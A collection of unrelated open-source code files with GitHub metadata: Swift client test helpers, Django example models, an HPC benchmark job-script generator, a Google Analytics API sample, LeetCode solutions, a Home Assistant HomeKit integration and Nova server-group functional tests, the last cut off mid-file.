            mock.patch('sys.stdout', self._out),
            mock.patch('sys.stderr', self._err),
        ])

    def __enter__(self):
        for patcher in self.patchers:
            patcher.start()
        return self

    def __exit__(self, *args, **kwargs):
        for patcher in self.patchers:
            patcher.stop()

    @property
    def out(self):
        """Everything captured on stdout, decoded as utf-8 text."""
        return self._out.getvalue().decode('utf8')

    @property
    def err(self):
        """Everything captured on stderr, decoded as utf-8 text."""
        return self._err.getvalue().decode('utf8')

    def clear(self):
        self._out.clear()
        self._err.clear()

    # String-like protocol: behave like the text captured on stdout.
    def __str__(self):
        return self.out

    def __len__(self):
        return len(self.out)

    def __eq__(self, other):
        return self.out == other

    def __ne__(self, other):
        return not self.__eq__(other)

    def __getattr__(self, name):
        return getattr(self.out, name)
class FakeKeystone(object):
    '''
    Fake keystone client module. Returns given endpoint url and auth token.

    Every Client() call — and every url_for() lookup on the resulting
    service catalog — is recorded so tests can assert on the arguments.
    '''

    def __init__(self, endpoint, token):
        self.calls = []
        self.auth_version = None
        self.endpoint = endpoint
        self.token = token

    class _Client(object):
        def __init__(self, endpoint, auth_token, **kwargs):
            self.auth_token = auth_token
            self.endpoint = endpoint
            self.service_catalog = self.ServiceCatalog(endpoint)

        class ServiceCatalog(object):
            def __init__(self, endpoint):
                self.calls = []
                self.endpoint_url = endpoint

            def url_for(self, **kwargs):
                # Record the lookup; always resolve to the configured URL.
                self.calls.append(kwargs)
                return self.endpoint_url

    def Client(self, **kwargs):
        # Remember both the call and the client instance it produced.
        self.calls.append(kwargs)
        client = self._Client(endpoint=self.endpoint,
                              auth_token=self.token, **kwargs)
        self.client = client
        return client

    class Unauthorized(Exception):
        pass

    class AuthorizationFailure(Exception):
        pass

    class EndpointNotFound(Exception):
        pass
class FakeStream(object):
    """
    File-like object that serves *size* bytes of b'A' without allocating
    them all up front.
    """

    def __init__(self, size):
        self.bytes_read = 0
        self.size = size

    def read(self, size=-1):
        # Exhausted: behave like a real stream and return empty bytes.
        if self.bytes_read == self.size:
            return b''
        if size == -1 or size + self.bytes_read > self.size:
            # Drain everything that is left.
            amount = self.size - self.bytes_read
            self.bytes_read = self.size
        else:
            amount = size
            self.bytes_read += size
        return b'A' * amount

    def __len__(self):
        return self.size
| {
"content_hash": "8c899b2e4b5a0205ff56422ead006fe0",
"timestamp": "",
"source": "github",
"line_count": 567,
"max_line_length": 78,
"avg_line_length": 35.91534391534392,
"alnum_prop": 0.5317226478098606,
"repo_name": "openstack/python-swiftclient",
"id": "87d32107843c6d8d1516e083a81f82b0ef2f764e",
"size": "20954",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "test/unit/utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "905985"
},
{
"name": "Shell",
"bytes": "1862"
}
],
"symlink_target": ""
} |
from django.db import models
class Fruit(models.Model):
    """
    A simple model of fruit
    """
    # Display name of the fruit.
    name = models.CharField(max_length=255)

    def __unicode__(self):
        # Python-2-era Django string representation.
        return self.name
class FavoriteFruit(models.Model):
    """A simple model to test foreign keys to fruits"""
    name = models.CharField(blank=True, max_length=100)
    # NOTE(review): no on_delete argument — this targets a pre-2.0 Django
    # where on_delete was optional; confirm before upgrading Django.
    fruit = models.ForeignKey(Fruit)

    def __unicode__(self):
        return "%s likes %s" % (self.name, self.fruit)
class FruitCombo(models.Model):
    """A simple model to test many-to-many keys to fruits"""
    name = models.CharField(blank=True, max_length=100)
    # Combo can contain any number of fruits; fruits can be in many combos.
    fruit = models.ManyToManyField(Fruit)

    def __unicode__(self):
        return "%s combo" % self.name
| {
"content_hash": "e279114b9e1b88280fab454d59291d43",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 60,
"avg_line_length": 27.444444444444443,
"alnum_prop": 0.6342780026990553,
"repo_name": "callowayproject/django-selectablewrapper",
"id": "6551ca3d5142a9840127baee7ad7c2cb79852df3",
"size": "741",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "example/simpleapp/models.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "498"
},
{
"name": "Python",
"bytes": "18196"
},
{
"name": "Shell",
"bytes": "3065"
}
],
"symlink_target": ""
} |
import subprocess
import sys
import os
import time
from subprocess import PIPE
import socket
import params
def extract_errors(output):
    """Parse the solver's stdout and pull out the diagnostic values.

    Scans *output* line by line for the known diagnostic prefixes and
    returns a list with one entry per prefix, in the order of match_list
    below. Entries stay "x" when the corresponding line is absent.
    """
    match_list = [
        'DIAGNOSTICS ANALYTICAL RMS H:',
        'DIAGNOSTICS ANALYTICAL RMS U:',
        'DIAGNOSTICS ANALYTICAL RMS V:',
        'DIAGNOSTICS ANALYTICAL MAXABS H:',
        'DIAGNOSTICS ANALYTICAL MAXABS U:',
        'DIAGNOSTICS ANALYTICAL MAXABS V:',
        'Simulation time (seconds):'
    ]
    # "x" marks a value that was not found in the output.
    vals = ["x"] * len(match_list)
    for line in output.splitlines():
        # splitlines() drops the line terminators; strip any stray '\r'
        # remaining mid-line (the original stripped \n and \r explicitly).
        line = line.replace('\r', '')
        for i, prefix in enumerate(match_list):
            if line.startswith(prefix):
                # The value starts one character (the space) after the
                # prefix, matching the original slicing behavior.
                vals[i] = line[len(prefix) + 1:]
    return vals
# Generate LSF batch scripts (plus matching compile scripts and one-off
# FFTW wisdom-planning jobs) for every combination of test case, MPI rank
# count, NUMA allocator, thread count and resolution listed in params.
fftw_written = False

for i in params.tests:
    # Each test entry: (id, extra run parameters, title, compile command,
    # compile id).
    id = i[0]
    parameters = i[1]
    title = i[2]
    compile_c = i[3]
    id_c = i[4]

    for mpi_ranks in params.mpi_ranks:
        for a in params.A_list:
            for threads in params.thread_list:
                for n in params.res_list:
                    # don't create mpi-parallelized jobs for non-mpi parallelized tests
                    if id[0:3] == 'nr_':
                        if mpi_ranks > 1:
                            continue

                    total_threads = mpi_ranks * threads
                    if total_threads > params.max_total_threads:
                        continue

                    compile_command = compile_c+" --numa-block-allocator="+str(a)+" "

                    # deactivate SWEET threading if geq 1 thread or REXI Parallel sum is enabled
                    no_threading = threads <= 1 or '--rexi-parallel-sum=enable' in compile_command
                    if no_threading:
                        compile_command += " --threading=off"
                    else:
                        compile_command += " --threading=omp"

                    file_id = id+"_t"+str(threads).zfill(3)+"_n"+str(n).zfill(4)+"_r"+str(mpi_ranks).zfill(4)+"_a"+str(a)
                    file_id_compile = id_c+"_t"+("no" if no_threading else "yes")+"_a"+str(a)

                    script_filename = params.curdir_name+"/run_"+file_id+".sh"
                    compile_script_filename = params.curdir_name+"/compile_"+file_id_compile+".sh"
                    output_filename = params.curdir_name+"/run_"+file_id+".txt"
                    output_filename_err = params.curdir_name+"/run_"+file_id+".err"

                    # Assemble the solver command line for this combination.
                    command = "./build/"+file_id_compile+" "
                    command += params.default_params
                    command += ' -C '+str(params.cfl)
                    command += ' -N '+str(n)
                    command += ' -U '+str(params.hyperviscosity[n])
                    command += parameters

                    """
                    http://community.hartree.stfc.ac.uk/wiki/site/admin/idataplex%20phase-2%20-%20further%20info.html
                    84 nodes, each node has 2 x 12 core Intel Xeon processors, A total of 2,016 cores.
                    Interconnect is Infiniband from Mellanox (FDR Connect-IB 56 GB/s).
                    42 of 84 have accelerators - an Intel Phi 5110P.
                    http://community.hartree.stfc.ac.uk/wiki/site/admin/jobs2.html
                    Jobs will by default go into the q1h32 queue.
                    Hyperthreading is deactivated!
                    24 cores per node available
                    # run 24 MPI tasks per node
                    #BSUB -R "span[ptile=24]"
                    # phase2 system has 2x12 cores per node
                    # number of overall MPI tasks
                    #BSUB -n 128
                    """
                    # NOTE(review): 24/threads below relies on integer
                    # division — this script targets Python 2 (see the
                    # python/2.7.8 module load); on Python 3 it would
                    # produce a float in the ptile spec.
                    script_headers = """#BSUB -R "span[ptile="""+str(24/threads)+"""]"
#BSUB -R "affinity[core("""+str(threads)+"""):cpubind=core:distribute=pack]"
#BSUB -R same[type:model]
###BSUB -R order[hosts]
# All on the same rack - TODO: does this really work?
##BSUB -R "cu[type=rack]"
##BSUB -R "cu[maxcus=1]"
# dedicated network
###BSUB -network "type=sn_all: usage=dedicated"
###BSUB -network "type=sn_single: usage=dedicated"
# exclusive resource
#BSUB -x
#BSUB -q nxq
#BSUB -W """+params.timeout+"""
#BSUB -n """+str(mpi_ranks)+"""
#declare -x NUMA_BLOCK_ALLOC_VERBOSITY=1
declare -x KMP_AFFINITY="granularity=thread,compact,1,0"
declare -x OMP_NUM_THREADS="""+str(threads)+"""
"""

                    # Shared environment setup sourced by every script.
                    env_header = """
. /etc/profile.d/modules.sh
module unload gcc
# This FFTW does not support OMP!!!
module unload fftw
module load python/2.7.8
module load intel/15.2.164
module load intel_mpi
cd """+os.getcwd()+"""
cd ../../../
. local_software/env_vars.sh
"""

                    print("Creating compile script "+compile_script_filename)
                    fd = open(compile_script_filename, "w")
                    fd.write("#! /bin/bash\n\n"+env_header+"\n\n"+compile_command+" --program-binary-name="+file_id_compile+" || exit 1\n")

                    # Emit the FFTW wisdom-planning jobs exactly once,
                    # one per possible thread count (0..max).
                    if not fftw_written:
                        for t in range(0, max(params.thread_list)+1):
                            fd = open("fftw_plan_"+str(t).zfill(3)+".sh", "w")
                            fd.write("""#BSUB -o fftw_plan_"""+str(t).zfill(3)+""".out
#BSUB -J fftw_plan_"""+str(t).zfill(3)+"""
"""+script_headers+"""
"""+env_header+"""
./fftw_gen_wisdoms_all.sh """+str(t)+"\n")
                        fftw_written = True

                    print("Creating script "+script_filename)
                    fd = open(script_filename, "w")
                    fd.write(
                        """#BSUB -o """+output_filename+"""
#BSUB -e """+output_filename_err+"""
#BSUB -J """+file_id+"""
"""+script_headers+"""
echo "LSB_BIND_CPU_LIST"
echo "$LSB_BIND_CPU_LIST"
echo "LSB_BIND_MEM_LIST"
echo "$LSB_BIND_MEM_LIST"
echo "LSB_BIND_MEM_POLICY"
echo "$LSB_BIND_MEM_POLICY"
# RM_CPUTASKn"
echo "RM_MEM_AFFINITY"
echo "$RM_MEM_AFFINITY"
echo "OMP_NUM_THREADS"
echo "$OMP_NUM_THREADS"
echo
"""+env_header+"""
# force to use FFTW WISDOM data
declare -x SWEET_FFTW_LOAD_WISDOM_FROM_FILE="FFTW_WISDOM_T"""+("0" if no_threading else str(threads))+""""
mpiexec.hydra -genv OMP_NUM_THREADS """+str(threads)+""" -envall -np """+str(mpi_ranks)+""" """+command+"""
""")
| {
"content_hash": "b662393d1a6b7acbfc8881564a99b420",
"timestamp": "",
"source": "github",
"line_count": 196,
"max_line_length": 124,
"avg_line_length": 26.8265306122449,
"alnum_prop": 0.6356028908330164,
"repo_name": "schreiberx/sweet",
"id": "34ee9ba443748e2396791d847ea4f62b02867b5c",
"size": "5279",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "archive/benchmarks_plane/rexi_tests_stfc/test_nxq/create_jobs_scalability.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "133036"
},
{
"name": "C++",
"bytes": "2947985"
},
{
"name": "Fortran",
"bytes": "109460"
},
{
"name": "GLSL",
"bytes": "27428"
},
{
"name": "Makefile",
"bytes": "312"
},
{
"name": "Python",
"bytes": "2503502"
},
{
"name": "Shell",
"bytes": "490940"
},
{
"name": "TeX",
"bytes": "3093"
}
],
"symlink_target": ""
} |
from django.db import models
from django.utils import timezone
# from django.contrib.auth.models import User
# Create your models here.
class Activity(models.Model):
    """A trackable activity with a free-text description and its unit of
    measurement (e.g. reps, minutes)."""
    # user = models.ForeignKey(User)
    full_description = models.CharField(max_length=255)
    units = models.CharField(max_length=40)

    class Meta:
        # Reverse relations default to `activities`.
        default_related_name = 'activities'

    def __str__(self):
        return self.full_description
class Stat(models.Model):
    """A rep count recorded for one Activity on one date."""
    activity = models.ForeignKey('Activity', related_name='stats')
    reps = models.PositiveIntegerField()
    # default=timezone.now without parentheses: evaluated at save time,
    # not at import time.
    date = models.DateField(default=timezone.now)

    class Meta:
        # Newest stats first.
        ordering = ['-date']
        # At most one stat per activity per day.
        unique_together = ('activity', 'date')

    def __str__(self):
        return '{} {} at {}'.format(self.reps,
                                    self.activity.units,
                                    self.date)
| {
"content_hash": "21770577bdb0ffa6fa8baf1795f75928",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 66,
"avg_line_length": 26.757575757575758,
"alnum_prop": 0.6138165345413363,
"repo_name": "jal-stats/django",
"id": "ad3bfb98ea951eaa4baafea0378023f572075272",
"size": "883",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "jal_stats/stats/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "14769"
}
],
"symlink_target": ""
} |
from google.analytics import admin_v1beta
def sample_get_property():
    """Fetch a single Analytics property and print the raw response."""
    admin_client = admin_v1beta.AnalyticsAdminServiceClient()
    # Build the request inline and issue the RPC in one step.
    property_response = admin_client.get_property(
        request=admin_v1beta.GetPropertyRequest(
            name="name_value",
        )
    )
    print(property_response)
# [END analyticsadmin_v1beta_generated_AnalyticsAdminService_GetProperty_sync]
| {
"content_hash": "7cf66fb01e6757f6ad05ecff2ff43794",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 78,
"avg_line_length": 24.736842105263158,
"alnum_prop": 0.7212765957446808,
"repo_name": "googleapis/python-analytics-admin",
"id": "ede4a2edfd6d4f42a8adaf903db3435a74db470e",
"size": "1872",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/generated_samples/analyticsadmin_v1beta_generated_analytics_admin_service_get_property_sync.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "5576405"
},
{
"name": "Shell",
"bytes": "30687"
}
],
"symlink_target": ""
} |
class Solution(object):
    def reconstructQueue(self, people):
        """
        :type people: List[List[int]]
        :rtype: List[List[int]]

        Sqrt-decomposition variant: keep the queue as a list of blocks of
        roughly sqrt(n) people each so each insertion scans few blocks.
        """
        # Tallest first; among equal heights, smaller k first.  A plain
        # one-argument lambda replaces the Python-2-only tuple-parameter
        # form ``lambda (h, k): ...`` which is a SyntaxError on Python 3.
        people.sort(key=lambda p: (-p[0], p[1]))

        blocks = [[]]
        for p in people:
            index = p[1]
            # Find the block containing the target insertion slot.
            for i, block in enumerate(blocks):
                if index <= len(block):
                    break
                index -= len(block)
            block.insert(index, p)
            # Split any block that grows past ~sqrt(n).  ``//`` keeps the
            # slice index an int on Python 3 (``/`` would produce a float
            # and raise TypeError when used as a slice bound).
            if len(block) * len(block) > len(people):
                blocks.insert(i + 1, block[len(block) // 2:])
                del block[len(block) // 2:]

        return [p for block in blocks for p in block]
# Time:  O(n^2)
# Space: O(n)
class Solution2(object):
    def reconstructQueue(self, people):
        """
        :type people: List[List[int]]
        :rtype: List[List[int]]
        """
        # Tallest first, ties broken by smaller k.  A plain lambda replaces
        # the Python-2-only tuple-parameter form ``lambda (h, k): ...``,
        # which is a SyntaxError on Python 3.
        people.sort(key=lambda p: (-p[0], p[1]))

        # Everyone already placed is at least as tall as p, so inserting p
        # at position k leaves exactly k taller-or-equal people in front.
        result = []
        for p in people:
            result.insert(p[1], p)
        return result
| {
"content_hash": "eaf203bf826e5938ec66c92bc8827473",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 56,
"avg_line_length": 26.86842105263158,
"alnum_prop": 0.4730656219392752,
"repo_name": "githubutilities/LeetCode",
"id": "7863a79ff1bc9c69e872a684eff5f072477d6bfd",
"size": "1549",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "Python/queue-reconstruction-by-height.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "713028"
},
{
"name": "Go",
"bytes": "2824"
},
{
"name": "Java",
"bytes": "8367"
},
{
"name": "Python",
"bytes": "717555"
},
{
"name": "SQLPL",
"bytes": "822"
},
{
"name": "Shell",
"bytes": "3218"
}
],
"symlink_target": ""
} |
from unittest import TestCase
from kingpin import config_utils
class PathConversionTestCase(TestCase):
    """Round-trip tests for zk path <-> config file path conversion."""

    example_config_path = '/var/config/config.manageddata.spam.domain_hidelist'
    example_zk_path = '/config/manageddata/spam/domain_hidelist'

    def test_get_config_file_path(self):
        # assertEqual replaces the long-deprecated assertEquals alias
        # (removed entirely in Python 3.12).
        self.assertEqual(
            self.example_config_path,
            config_utils.get_config_file_path(self.example_zk_path))

    def test_get_zk_path(self):
        self.assertEqual(
            self.example_zk_path,
            config_utils.get_zk_path(self.example_config_path))
| {
"content_hash": "7d7af3dde6cfe50972617634c1f44341",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 79,
"avg_line_length": 32.5,
"alnum_prop": 0.6871794871794872,
"repo_name": "pinterest/kingpin",
"id": "4110ae1c0c5c1801f2e9c7472eefce5fd7d56860",
"size": "1184",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "kingpin/tests/config_utils/test_config_utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "454238"
}
],
"symlink_target": ""
} |
"""Support for Homekit device discovery."""
from __future__ import annotations
import asyncio
from typing import Any
import aiohomekit
from aiohomekit.model import Accessory
from aiohomekit.model.characteristics import (
Characteristic,
CharacteristicPermissions,
CharacteristicsTypes,
)
from aiohomekit.model.services import Service, ServicesTypes
from homeassistant.components import zeroconf
from homeassistant.const import ATTR_VIA_DEVICE, EVENT_HOMEASSISTANT_STOP
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers.entity import DeviceInfo, Entity
from .config_flow import normalize_hkid
from .connection import HKDevice, valid_serial_number
from .const import (
CONTROLLER,
DOMAIN,
ENTITY_MAP,
IDENTIFIER_ACCESSORY_ID,
IDENTIFIER_SERIAL_NUMBER,
KNOWN_DEVICES,
TRIGGERS,
)
from .storage import EntityMapStorage
def escape_characteristic_name(char_name):
    """Escape any dash or dots in a characteristics name."""
    # Single C-level pass over the string instead of chained replace().
    return char_name.translate(str.maketrans("-.", "__"))
class HomeKitEntity(Entity):
    """Representation of a Home Assistant HomeKit device."""

    # State changes arrive via dispatcher signals, so HA polling is off.
    _attr_should_poll = False

    def __init__(self, accessory, devinfo):
        """Initialise a generic HomeKit device.

        accessory: the HKDevice connection owning this entity.
        devinfo: dict with the accessory id ("aid") and instance id ("iid")
        of the service this entity represents.
        """
        self._accessory = accessory
        self._aid = devinfo["aid"]
        self._iid = devinfo["iid"]
        self._features = 0
        # setup() populates pollable/watchable characteristic lists.
        self.setup()

        self._signals = []

        super().__init__()

    @property
    def accessory(self) -> Accessory:
        """Return an Accessory model that this entity is attached to."""
        return self._accessory.entity_map.aid(self._aid)

    @property
    def accessory_info(self) -> Service:
        """Information about the make and model of an accessory."""
        return self.accessory.services.first(
            service_type=ServicesTypes.ACCESSORY_INFORMATION
        )

    @property
    def service(self) -> Service:
        """Return a Service model that this entity is attached to."""
        return self.accessory.services.iid(self._iid)

    async def async_added_to_hass(self):
        """Entity added to hass."""
        # Keep the unsubscribe callback so async_will_remove_from_hass
        # can disconnect the listener again.
        self._signals.append(
            self.hass.helpers.dispatcher.async_dispatcher_connect(
                self._accessory.signal_state_updated, self.async_write_ha_state
            )
        )

        self._accessory.add_pollable_characteristics(self.pollable_characteristics)
        self._accessory.add_watchable_characteristics(self.watchable_characteristics)

    async def async_will_remove_from_hass(self):
        """Prepare to be removed from hass."""
        # NOTE(review): these remove by aid only, so this appears to drop
        # the whole accessory's registrations, not just this entity's iids.
        self._accessory.remove_pollable_characteristics(self._aid)
        self._accessory.remove_watchable_characteristics(self._aid)

        for signal_remove in self._signals:
            signal_remove()
        self._signals.clear()

    async def async_put_characteristics(self, characteristics: dict[str, Any]):
        """
        Write characteristics to the device.

        A characteristic type is unique within a service, but in order to write
        to a named characteristic on a bridge we need to turn its type into
        an aid and iid, and send it as a list of tuples, which is what this
        helper does.

        E.g. you can do:

            await entity.async_put_characteristics({
                CharacteristicsTypes.ON: True
            })
        """
        payload = self.service.build_update(characteristics)
        return await self._accessory.put_characteristics(payload)

    def setup(self):
        """Configure an entity based on its HomeKit characteristics metadata."""
        self.pollable_characteristics = []
        self.watchable_characteristics = []

        char_types = self.get_characteristic_types()

        # Setup events and/or polling for characteristics directly attached
        # to this entity.
        for char in self.service.characteristics.filter(char_types=char_types):
            self._setup_characteristic(char)

        # Setup events and/or polling for characteristics attached to
        # sub-services of this entity (like an INPUT_SOURCE).
        for service in self.accessory.services.filter(parent_service=self.service):
            for char in service.characteristics.filter(char_types=char_types):
                self._setup_characteristic(char)

    def _setup_characteristic(self, char: Characteristic):
        """Configure an entity based on a HomeKit characteristics metadata."""
        # Build up a list of (aid, iid) tuples to poll on update()
        if CharacteristicPermissions.paired_read in char.perms:
            self.pollable_characteristics.append((self._aid, char.iid))

        # Build up a list of (aid, iid) tuples to subscribe to
        if CharacteristicPermissions.events in char.perms:
            self.watchable_characteristics.append((self._aid, char.iid))

    @property
    def unique_id(self) -> str:
        """Return the ID of this device."""
        info = self.accessory_info
        serial = info.value(CharacteristicsTypes.SERIAL_NUMBER)
        if valid_serial_number(serial):
            return f"homekit-{serial}-{self._iid}"
        # Some accessories do not have a serial number
        return f"homekit-{self._accessory.unique_id}-{self._aid}-{self._iid}"

    @property
    def name(self) -> str:
        """Return the name of the device if any."""
        return self.accessory_info.value(CharacteristicsTypes.NAME)

    @property
    def available(self) -> bool:
        """Return True if entity is available."""
        return self._accessory.available and self.service.available

    @property
    def device_info(self) -> DeviceInfo:
        """Return the device info."""
        info = self.accessory_info
        accessory_serial = info.value(CharacteristicsTypes.SERIAL_NUMBER)

        if valid_serial_number(accessory_serial):
            identifier = (DOMAIN, IDENTIFIER_SERIAL_NUMBER, accessory_serial)
        else:
            # Some accessories do not have a serial number; fall back to
            # a synthetic accessory id.
            identifier = (
                DOMAIN,
                IDENTIFIER_ACCESSORY_ID,
                f"{self._accessory.unique_id}_{self._aid}",
            )

        device_info = DeviceInfo(
            identifiers={identifier},
            manufacturer=info.value(CharacteristicsTypes.MANUFACTURER, ""),
            model=info.value(CharacteristicsTypes.MODEL, ""),
            name=info.value(CharacteristicsTypes.NAME),
            sw_version=info.value(CharacteristicsTypes.FIRMWARE_REVISION, ""),
        )

        # Some devices only have a single accessory - we don't add a
        # via_device otherwise it would be self referential.
        bridge_serial = self._accessory.connection_info["serial-number"]
        if accessory_serial != bridge_serial:
            device_info[ATTR_VIA_DEVICE] = (
                DOMAIN,
                IDENTIFIER_SERIAL_NUMBER,
                bridge_serial,
            )

        return device_info

    def get_characteristic_types(self):
        """Define the homekit characteristics the entity cares about."""
        raise NotImplementedError
class AccessoryEntity(HomeKitEntity):
    """An entity scoped to an entire accessory rather than one of its services or characteristics."""

    @property
    def unique_id(self) -> str:
        """Return the ID of this device."""
        serial_number = self.accessory_info.value(
            CharacteristicsTypes.SERIAL_NUMBER
        )
        return f"homekit-{serial_number}-aid:{self._aid}"
class CharacteristicEntity(HomeKitEntity):
    """
    An entity backed by a single characteristic instead of a whole service.

    Typically used to expose extra sensor, binary_sensor or number entities
    that do not belong with the service entity.
    """

    def __init__(self, accessory, devinfo, char):
        """Initialise a generic single characteristic HomeKit entity."""
        # Keep a handle on the backing characteristic before the base
        # class runs setup().
        self._char = char
        super().__init__(accessory, devinfo)

    @property
    def unique_id(self) -> str:
        """Return the ID of this device."""
        char = self._char
        serial_number = self.accessory_info.value(
            CharacteristicsTypes.SERIAL_NUMBER
        )
        return (
            f"homekit-{serial_number}-aid:{self._aid}"
            f"-sid:{char.service.iid}-cid:{char.iid}"
        )
async def async_setup_entry(hass, entry):
    """Set up a HomeKit connection on a config entry."""
    conn = HKDevice(hass, entry, entry.data)
    hass.data[KNOWN_DEVICES][conn.unique_id] = conn

    # For backwards compat: entries created before unique ids existed get
    # one assigned from the pairing id.
    if entry.unique_id is None:
        hass.config_entries.async_update_entry(
            entry, unique_id=normalize_hkid(conn.unique_id)
        )

    if not await conn.async_setup():
        # Undo the registration above so a later retry starts clean.
        del hass.data[KNOWN_DEVICES][conn.unique_id]
        raise ConfigEntryNotReady

    return True
async def async_setup(hass, config):
    """Set up for Homekit devices."""
    # Persisted accessory/entity map cache shared by all connections.
    map_storage = hass.data[ENTITY_MAP] = EntityMapStorage(hass)
    await map_storage.async_initialize()

    async_zeroconf_instance = await zeroconf.async_get_async_instance(hass)
    hass.data[CONTROLLER] = aiohomekit.Controller(
        async_zeroconf_instance=async_zeroconf_instance
    )
    hass.data[KNOWN_DEVICES] = {}
    hass.data[TRIGGERS] = {}

    async def _async_stop_homekit_controller(event):
        # Disconnect every paired device concurrently on shutdown.
        await asyncio.gather(
            *(
                connection.async_unload()
                for connection in hass.data[KNOWN_DEVICES].values()
            )
        )

    hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, _async_stop_homekit_controller)

    return True
async def async_unload_entry(hass, entry):
    """Disconnect from HomeKit devices before unloading entry."""
    pairing_id = entry.data["AccessoryPairingID"]
    connection = hass.data[KNOWN_DEVICES].get(pairing_id)
    if connection is not None:
        await connection.async_unload()
    return True
async def async_remove_entry(hass, entry):
    """Cleanup caches before removing config entry."""
    pairing_id = entry.data["AccessoryPairingID"]
    entity_map_storage = hass.data[ENTITY_MAP]
    entity_map_storage.async_delete_map(pairing_id)
| {
"content_hash": "777e920a6aec625aff4161bfe1155971",
"timestamp": "",
"source": "github",
"line_count": 286,
"max_line_length": 115,
"avg_line_length": 35.17482517482517,
"alnum_prop": 0.6577534791252485,
"repo_name": "jawilson/home-assistant",
"id": "f91355906dceaf5dc35aff79a2892131fa6820ba",
"size": "10060",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "homeassistant/components/homekit_controller/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2782"
},
{
"name": "Python",
"bytes": "40129467"
},
{
"name": "Shell",
"bytes": "4910"
}
],
"symlink_target": ""
} |
import time
import mock
from oslo_config import cfg
from nova import context
from nova import db
from nova.db.sqlalchemy import api as db_api
from nova import test
from nova.tests import fixtures as nova_fixtures
from nova.tests.functional.api import client
from nova.tests.functional import integrated_helpers
from nova.tests.unit import fake_network
from nova.tests.unit import policy_fixture
import nova.scheduler.utils
import nova.servicegroup
import nova.tests.unit.image.fake
CONF = cfg.CONF
# An alternate project id
PROJECT_ID_ALT = "616c6c796f7572626173656172656f73"
class ServerGroupTestBase(test.TestCase,
                          integrated_helpers.InstanceHelperMixin):
    """Shared fixtures and helpers for the server-group functional tests."""

    REQUIRES_LOCKING = True

    api_major_version = 'v2.1'
    # Subclasses may pin a specific API microversion.
    microversion = None

    # Note(gibi): RamFilter is needed to ensure that
    # test_boot_servers_with_affinity_no_valid_host behaves as expected
    _scheduler_default_filters = ['ServerGroupAntiAffinityFilter',
                                  'ServerGroupAffinityFilter',
                                  'RamFilter']

    # Override servicegroup parameters to make the tests run faster
    _service_down_time = 2
    _report_interval = 1

    # Canonical group definitions reused across the test cases.
    anti_affinity = {'name': 'fake-name-1', 'policies': ['anti-affinity']}
    affinity = {'name': 'fake-name-2', 'policies': ['affinity']}

    def _get_weight_classes(self):
        # Subclasses override this to load scheduler weighers.
        return []

    def setUp(self):
        super(ServerGroupTestBase, self).setUp()
        self.flags(scheduler_default_filters=self._scheduler_default_filters)
        self.flags(scheduler_weight_classes=self._get_weight_classes())
        self.flags(service_down_time=self._service_down_time)
        self.flags(report_interval=self._report_interval)

        self.useFixture(policy_fixture.RealPolicyFixture())

        api_fixture = self.useFixture(nova_fixtures.OSAPIFixture(
            api_version='v2.1'))

        self.api = api_fixture.api
        self.api.microversion = self.microversion

        self.admin_api = api_fixture.admin_api
        self.admin_api.microversion = self.microversion

        # the image fake backend needed for image discovery
        nova.tests.unit.image.fake.stub_out_image_service(self)

        self.start_service('conductor', manager=CONF.conductor.manager)
        self.start_service('scheduler')

        self.addCleanup(nova.tests.unit.image.fake.FakeImageService_reset)

    def _boot_a_server_to_group(self, group,
                                expected_status='ACTIVE', flavor=None):
        """Boot one server with a scheduler hint tying it to *group* and
        wait for it to reach *expected_status*.
        """
        server = self._build_minimal_create_server_request(self.api,
                                                          'some-server')
        if flavor:
            server['flavorRef'] = ('http://fake.server/%s'
                                   % flavor['id'])
        post = {'server': server,
                'os:scheduler_hints': {'group': group['id']}}
        created_server = self.api.post_server(post)
        self.assertTrue(created_server['id'])

        # Wait for it to finish being created
        found_server = self._wait_for_state_change(
            self.admin_api, created_server, expected_status)

        return found_server
class ServerGroupTestV21(ServerGroupTestBase):
    """Functional tests for server group CRUD and scheduling policies."""

    def setUp(self):
        super(ServerGroupTestV21, self).setUp()
        self.start_service('network')
        self.compute = self.start_service('compute')

        # NOTE(gibi): start a second compute host to be able to test affinity
        self.compute2 = self.start_service('compute', host='host2')
        fake_network.set_stub_network_methods(self)

    def test_get_no_groups(self):
        """Listing server groups on a fresh deployment returns []."""
        groups = self.api.get_server_groups()
        self.assertEqual([], groups)

    def test_create_and_delete_groups(self):
        """Create both policy kinds, verify the representation, then delete."""
        groups = [self.anti_affinity,
                  self.affinity]
        created_groups = []
        for group in groups:
            created_group = self.api.post_server_groups(group)
            created_groups.append(created_group)
            self.assertEqual(group['name'], created_group['name'])
            self.assertEqual(group['policies'], created_group['policies'])
            self.assertEqual([], created_group['members'])
            self.assertEqual({}, created_group['metadata'])
            self.assertIn('id', created_group)

            group_details = self.api.get_server_group(created_group['id'])
            self.assertEqual(created_group, group_details)

            existing_groups = self.api.get_server_groups()
            self.assertIn(created_group, existing_groups)

        existing_groups = self.api.get_server_groups()
        self.assertEqual(len(groups), len(existing_groups))

        for group in created_groups:
            self.api.delete_server_group(group['id'])
